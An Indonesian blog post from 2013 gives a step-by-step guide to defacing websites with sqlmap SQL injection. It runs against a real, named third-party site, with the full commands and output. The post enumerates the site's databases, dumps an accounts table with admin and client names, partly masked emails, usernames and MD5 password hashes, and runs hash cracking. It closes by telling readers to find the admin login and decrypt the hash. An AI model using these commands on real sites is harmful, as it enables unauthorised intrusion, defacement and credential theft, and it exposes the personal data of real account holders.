-------------------------------------------------------------------------
banyak teman-teman saya yang minta ingin belajar deface pakaii sqlmap inii..
OK sesuai dengan judul di atas saya akan share cara deface sebuah web dengan menggunakan tool Sqlmap, disini saya menggunakan OS Backtrack si naga hacking hehee,
karna disinii toolsnya lengkap kalo tantang hacking
ok langsung aja cekidot :
pertama cari target yg mempunyai vuln,
buka terminal ketik:
#cd /pentest/database/sqlmap
ato bisa juga lewat menu (alt + f1) backtrack => exploitation tool => web explotation tool => sqlmap
trus ketik:
#./sqlmap.py -u http://cla.pwwebhost.com/show.php?id=169 --dbs
sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 00:04:16
[00:04:16] [INFO] resuming back-end DBMS 'mysql'
[00:04:19] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=169 AND 7370=7370
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=169 AND (SELECT 5067 FROM(SELECT COUNT(*),CONCAT(0x3a7a70623a,(SELECT (CASE WHEN (5067=5067) THEN 1 ELSE 0 END)),0x3a78796c3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=169 AND SLEEP(5)
---
[00:04:24] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 5.3.17
back-end DBMS: MySQL 5.0
[00:04:24] [INFO] fetching database names
[00:04:24] [INFO] the SQL query used returns 45 entries
available databases [45]:
[*] information_schema
[*] pwwebho_500story
[*] pwwebho_cla2011
[*] pwwebho_CLAArchive2011
[*] pwwebho_clademo
[*] pwwebho_cladrupal
[*] pwwebho_claexhib
[*] pwwebho_claexport
[*] pwwebho_claforms
[*] pwwebho_copp1
[*] pwwebho_dbconf
[*] pwwebho_dprj1
[*] pwwebho_drpl1
[*] pwwebho_drpl2
[*] pwwebho_felic
[*] pwwebho_forms
[*] pwwebho_gracedb
[*] pwwebho_informz
[*] pwwebho_jdrf
[*] pwwebho_jo151
[*] pwwebho_jo1510
[*] pwwebho_jo1511
[*] pwwebho_jo1512
[*] pwwebho_jo1513
[*] pwwebho_jo1514
[*] pwwebho_jo1515
[*] pwwebho_jo1516
[*] pwwebho_jo152
[*] pwwebho_jo153
[*] pwwebho_jo154
[*] pwwebho_jo155
[*] pwwebho_jo156
[*] pwwebho_jo157
[*] pwwebho_jo158
[*] pwwebho_jo159
[*] pwwebho_joomla
[*] pwwebho_lime1
[*] pwwebho_lime2
[*] pwwebho_lime3
[*] pwwebho_nubls
[*] pwwebho_ostt1
[*] pwwebho_tree
[*] pwwebho_vote
[*] pwwebho_wrdp1
[*] pwwebho_wrdp2
[00:04:24] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/cla.pwwebhost.com'
[*] shutting down at 00:04:24
-u = url target
--dbs= option untuk mencari databasenya
setelah ketemu pilih database yg kira" ada table login admin, dalam contoh kali ini saya pilih "pwwebho_claforms", lanjut..
#./sqlmap.py -u http://cla.pwwebhost.com/show.php?id=169 -D pwwebho_claforms --tables
sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 00:14:22
[00:14:22] [INFO] resuming back-end DBMS 'mysql'
[00:14:23] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=169 AND 7370=7370
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=169 AND (SELECT 5067 FROM(SELECT COUNT(*),CONCAT(0x3a7a70623a,(SELECT (CASE WHEN (5067=5067) THEN 1 ELSE 0 END)),0x3a78796c3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=169 AND SLEEP(5)
---
[00:14:26] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 5.3.17
back-end DBMS: MySQL 5.0
[00:14:26] [INFO] fetching tables for database: 'pwwebho_claforms'
[00:14:26] [INFO] the SQL query used returns 47 entries
[00:14:29] [INFO] retrieved: ft_module_menu_items
[00:14:31] [INFO] retrieved: ft_module_pages
[00:14:34] [INFO] retrieved: ft_module_pages_clients
[00:14:35] [INFO] retrieved: ft_module_submission_accounts
[00:14:37] [INFO] retrieved: ft_module_submission_accounts_data
[00:14:39] [INFO] retrieved: ft_module_submission_accounts_menus
[00:14:41] [INFO] retrieved: ft_module_submission_accounts_view_override
[00:14:42] [INFO] retrieved: ft_module_swift_mailer_email_template_fields
[00:14:44] [INFO] retrieved: ft_modules
[00:14:46] [INFO] retrieved: ft_multi_page_form_urls
[00:14:48] [INFO] retrieved: ft_public_form_omit_list
[00:14:51] [INFO] retrieved: ft_public_view_omit_list
[00:14:54] [INFO] retrieved: ft_sessions
[00:14:57] [INFO] retrieved: ft_settings
[00:14:59] [INFO] retrieved: ft_themes
[00:15:01] [INFO] retrieved: ft_view_fields
[00:15:03] [INFO] retrieved: ft_view_filters
[00:15:04] [INFO] retrieved: ft_view_tabs
[00:15:06] [INFO] retrieved: ft_views
Database: pwwebho_claforms
[47 tables]
+----------------------------------------------+
| displink_files
| displink_settings
| displink_statistics
| displink_tickets
| ft_account_settings
| ft_accounts
| ft_client_forms
| ft_client_views
| ft_email_template_edit_submission_views
| ft_email_template_recipients
| ft_email_templates
| ft_field_option_groups
| ft_field_options
| ft_field_settings
| ft_form_10
| ft_form_11
| ft_form_7
| ft_form_8
| ft_form_9
| ft_form_email_fields
| ft_form_fields
| ft_forms
| ft_hooks
| ft_menu_items
| ft_menus
| ft_module_export_group_clients
| ft_module_export_groups
| ft_module_export_types
| ft_module_menu_items
| ft_module_pages
| ft_module_pages_clients
| ft_module_submission_accounts
| ft_module_submission_accounts_data
| ft_module_submission_accounts_menus
| ft_module_submission_accounts_view_override
| ft_module_swift_mailer_email_template_fields
| ft_modules
| ft_multi_page_form_urls
| ft_public_form_omit_list
| ft_public_view_omit_list
| ft_sessions
| ft_settings
| ft_themes
| ft_view_fields
| ft_view_filters
| ft_view_tabs
| ft_views
+----------------------------------------------+
[00:15:07] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/cla.pwwebhost.com'
[*] shutting down at 00:15:07
-D = database target
-- tables = untuk mencati nama table
ok ternyata ada table "ft_accounts" di situ, langsung aja (ini dalam kasus saya mungkin dalam kasus anda akan berbeda, jadi tingkatkanlah ilmu kira-kira sobat, hahaa)
#./sqlmap.py -u http://cla.pwwebhost.com/show.php?id=169 -D pwwebho_claforms -T ft_accounts --columns
sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 00:19:12
[00:19:12] [INFO] resuming back-end DBMS 'mysql'
[00:19:13] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=169 AND 7370=7370
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=169 AND (SELECT 5067 FROM(SELECT COUNT(*),CONCAT(0x3a7a70623a,(SELECT (CASE WHEN (5067=5067) THEN 1 ELSE 0 END)),0x3a78796c3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=169 AND SLEEP(5)
---
[00:19:16] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 5.3.17
back-end DBMS: MySQL 5.0
[00:19:16] [INFO] fetching columns for table 'ft_accounts' in database 'pwwebho_claforms'
[00:19:19] [INFO] the SQL query used returns 16 entries
[00:19:21] [INFO] retrieved: account_id
[00:19:22] [INFO] retrieved: mediumint(8) unsigned
[00:19:24] [INFO] retrieved: account_type
[00:19:26] [INFO] retrieved: enum('admin','client')
[00:19:27] [INFO] retrieved: account_status
[00:19:29] [INFO] retrieved: enum('active','disabled','pending')
[00:19:31] [INFO] retrieved: ui_language
[00:19:33] [INFO] retrieved: varchar(50)
[00:19:34] [INFO] retrieved: timezone_offset
[00:19:36] [INFO] retrieved: varchar(4)
[00:19:38] [INFO] retrieved: sessions_timeout
[00:19:39] [INFO] retrieved: varchar(10)
[00:19:41] [INFO] retrieved: date_format
[00:19:45] [INFO] retrieved: varchar(50)
[00:19:46] [INFO] retrieved: login_page
[00:19:49] [INFO] retrieved: varchar(50)
[00:19:51] [INFO] retrieved: logout_url
[00:19:53] [INFO] retrieved: varchar(255)
[00:19:54] [INFO] retrieved: theme
[00:19:56] [INFO] retrieved: varchar(50)
[00:19:58] [INFO] retrieved: menu_id
[00:20:00] [INFO] retrieved: mediumint(8) unsigned
[00:20:02] [INFO] retrieved: first_name
[00:20:04] [INFO] retrieved: varchar(100)
[00:20:06] [INFO] retrieved: last_name
[00:20:08] [INFO] retrieved: varchar(100)
[00:20:09] [INFO] retrieved: email
[00:20:11] [INFO] retrieved: varchar(200)
[00:20:13] [INFO] retrieved: username
[00:20:15] [INFO] retrieved: varchar(50)
[00:20:16] [INFO] retrieved: password
[00:20:18] [INFO] retrieved: varchar(50)
Database: pwwebho_claforms
Table: ft_accounts
[16 columns]
+------------------+-------------------------------------+
| Column | Type
+------------------+-------------------------------------+
| account_id | mediumint(8) unsigned
| account_status | enum('active','disabled','pending')
| account_type | enum('admin','client')
| date_format | varchar(50)
| email | varchar(200)
| first_name | varchar(100)
| last_name | varchar(100)
| login_page | varchar(50)
| logout_url | varchar(255)
| menu_id | mediumint(8) unsigned
| password | varchar(50)
| sessions_timeout | varchar(10)
| theme | varchar(50)
| timezone_offset | varchar(4)
| ui_language | varchar(50)
| username | varchar(50)
+------------------+-------------------------------------+
[00:20:18] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/cla.pwwebhost.com'
[*] shutting down at 00:20:18
-T = nama tables
--columns = untuk mencari kolom
ternyata benar perkiraan saya hehee, langsung dump
#./sqlmap.py -u http://cla.pwwebhost.com/show.php?id=169 -D pwwebho_claforms -T ft_accounts --dump
sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 00:23:41
[00:23:41] [INFO] resuming back-end DBMS 'mysql'
[00:23:42] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=169 AND 7370=7370
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=169 AND (SELECT 5067 FROM(SELECT COUNT(*),CONCAT(0x3a7a70623a,(SELECT (CASE WHEN (5067=5067) THEN 1 ELSE 0 END)),0x3a78796c3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=169 AND SLEEP(5)
---
[00:23:45] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 5.3.17
back-end DBMS: MySQL 5.0
[00:23:45] [INFO] fetching columns for table 'ft_accounts' in database 'pwwebho_claforms'
[00:23:45] [INFO] the SQL query used returns 16 entries
[00:23:45] [INFO] resumed: account_id
[00:23:45] [INFO] resumed: mediumint(8) unsigned
[00:23:45] [INFO] resumed: account_type
[00:23:45] [INFO] resumed: enum('admin','client')
[00:23:45] [INFO] resumed: account_status
[00:23:45] [INFO] resumed: enum('active','disabled','pending')
[00:23:45] [INFO] resumed: ui_language
[00:23:45] [INFO] resumed: varchar(50)
[00:23:45] [INFO] resumed: timezone_offset
[00:23:45] [INFO] resumed: varchar(4)
[00:23:45] [INFO] resumed: sessions_timeout
[00:23:45] [INFO] resumed: varchar(10)
[00:23:45] [INFO] resumed: date_format
[00:23:45] [INFO] resumed: varchar(50)
[00:23:45] [INFO] resumed: login_page
[00:23:45] [INFO] resumed: varchar(50)
[00:23:45] [INFO] resumed: logout_url
[00:23:45] [INFO] resumed: varchar(255)
[00:23:45] [INFO] resumed: theme
[00:23:45] [INFO] resumed: varchar(50)
[00:23:45] [INFO] resumed: menu_id
[00:23:45] [INFO] resumed: mediumint(8) unsigned
[00:23:45] [INFO] resumed: first_name
[00:23:45] [INFO] resumed: varchar(100)
[00:23:45] [INFO] resumed: last_name
[00:23:45] [INFO] resumed: varchar(100)
[00:23:45] [INFO] resumed: email
[00:23:45] [INFO] resumed: varchar(200)
[00:23:45] [INFO] resumed: username
[00:23:45] [INFO] resumed: varchar(50)
[00:23:45] [INFO] resumed: password
[00:23:45] [INFO] resumed: varchar(50)
[00:23:45] [INFO] fetching entries for table 'ft_accounts' in database 'pwwebho_claforms'
[00:23:47] [INFO] the SQL query used returns 2 entries
[00:23:49] [INFO] retrieved: 1
[00:23:51] [INFO] retrieved: active
[00:23:52] [INFO] retrieved: admin
[00:23:54] [INFO] retrieved: M jS, g:i A
[00:23:56] [INFO] retrieved: pe***@*****design.com
[00:23:57] [INFO] retrieved: Pe**y
[00:23:59] [INFO] retrieved: **rne
[00:24:01] [INFO] retrieved: admin_forms
[00:24:03] [INFO] retrieved: http://cla.pwwebhost.com/formtools
[00:24:05] [INFO] retrieved: 1
[00:24:07] [INFO] retrieved: fd027c9bdfc366945915749be5dfd449
[00:24:09] [INFO] retrieved: 30
[00:24:10] [INFO] retrieved: default
[00:24:12] [INFO] retrieved: 0
[00:24:14] [INFO] retrieved: en_us
[00:24:15] [INFO] retrieved: ****ake
[00:24:17] [INFO] retrieved: 2
[00:24:19] [INFO] retrieved: active
[00:24:21] [INFO] retrieved: client
[00:24:23] [INFO] retrieved: M jS y, g:i A
[00:24:24] [INFO] retrieved: *****ne@****ail.com
[00:24:26] [INFO] retrieved: Wendy
[00:24:28] [INFO] retrieved: Walton
[00:24:30] [INFO] retrieved: client_forms
[00:24:31] [INFO] retrieved: http://cla.pwwebhost.com/formtools
[00:24:33] [INFO] retrieved: 2
[00:24:34] [INFO] retrieved: 7f3e1ed7c0a4450e575a9d70c11f01ea
[00:24:36] [INFO] retrieved: 60
[00:24:38] [INFO] retrieved: default
[00:24:39] [INFO] retrieved: 0
[00:24:42] [INFO] retrieved: en_us
[00:24:43] [INFO] retrieved: wendyw
[00:24:43] [INFO] analyzing table dump for possible password hashes
recognized possible password hashes in column 'password'. Do you want to crack them via a dictionary-based attack? [Y/n/q] y
[00:31:07] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/pentest/database/sqlmap/txt/wordlist.txt' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
1
[00:31:15] [INFO] using default dictionary
[00:31:15] [INFO] loading dictionary from '/pentest/database/sqlmap/txt/wordlist.txt'
do you want to use common password suffixes? (slow!) [y/N] n
[00:31:19] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[00:31:19] [INFO] starting 4 processes
[00:31:24] [INFO] writing uncracked hashes to file '/tmp/tmp7Yf0NT.txt' for eventual further processing
[00:31:24] [WARNING] no clear password(s) found
[00:31:24] [INFO] postprocessing table dump
Database: pwwebho_claforms
Table: ft_accounts
--dump = untuk mengambil semua isi table tadi
saya potong sebagian karna hasilnya campur aduk kagak jelas, saya capture aja biar jelas, hehee
ok, tinggal cari pagelogin admin dan decrypt hash passnya beres deh, hehee..
sekarang tergantung sobat dalam menggunakan tool ini, .. :D
maaf saya gag sertain gambar .. menurut saya ini sudah cukup untuk dimengertii ..
Friday, April 26, 2013
Newer Post
Previous
This is the last post.
Subscribe to:
Post Comments (Atom)
0 komentar:
Post a Comment